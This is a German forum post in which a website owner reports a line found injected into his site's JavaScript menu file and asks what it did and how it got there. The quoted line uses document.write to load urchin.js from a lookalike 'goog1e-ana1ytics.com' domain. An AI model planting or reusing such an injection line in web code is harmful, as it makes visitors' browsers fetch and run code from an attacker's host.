Hallo,
ich hab mich immer gefragt wenn ich auf meine domain gegangen bin warum der
browser erstmal wo anders hin telefoniert und zwar immer nach
http://www.goog1e-ana1ytics.com/urchin.js
bis der browser nach einem time out die seite schliesslich anzeigt
Als ich mein javascript ausgeschaltet hab, ging alles sofort.
Da bin ich drauf gekommen dass da was im javascript nicht kusch sein muss.
So und da hatte ich beim durchstöbern gesehen dass da jemand(nicht ich) diese zeile
document.write("<script src=http://www.goog1e-ana1ytics.com/urchin.js></script>");
in eine *.js datei geschrieben hat und ziehmlich am anfang.
Die menuebar wurde desshalb auch nicht mehr korrekt angezeigt.

Die zeile sollte so aussehen:
if (document.all)    {n=0;ie=1;ns6=0;fShow="visible";fHide="hidden";}
if (document.getElementById&&!document.all)    {n=0;ie=0;ns6=1;fShow="visible";fHide="hidden";}
if (document.layers) {n=1;ie=0;ns6=0;fShow="show";fHide="hide";}

opr6=window.opera?1:0;

sah aber so aus:
if (document.all)    {n=0;ie=1;ns6=0;fShow="visible";fHide="hidden";}
if (document.getElementById&&!document.all)    {n=0;ie=0;ns6=1;fShow="visible";fHide="hidden";}
if (document.layers) {n=1;ie=0;ns6=0;fShow="show";fHide="hide";}
document.write("<script src=http://www.goog1e-ana1ytics.com/urchin.js></script>");
opr6=window.opera?1:0;

Das andere ist alles noch da und nicht verändert.
Frag mich jetzt aber schon was das für einen zweck gehabt hat
Ist das ein ehemaliger link zu einem virus gewesen?
Und wie hat er das geschafft das script zu ändern?
Die rechte für das script sind 644 also eigentlich nicht beschreibbar für andere ausserhalb.
Und normalerweise hab nur ich zugriff auf das ftp bzw den server.
Es ist leider schon länger her am 27.12.2007 wo diese datei verändert wurde,
daher kann ich den verursacher nicht ausfindig machen.
MfG
rolfi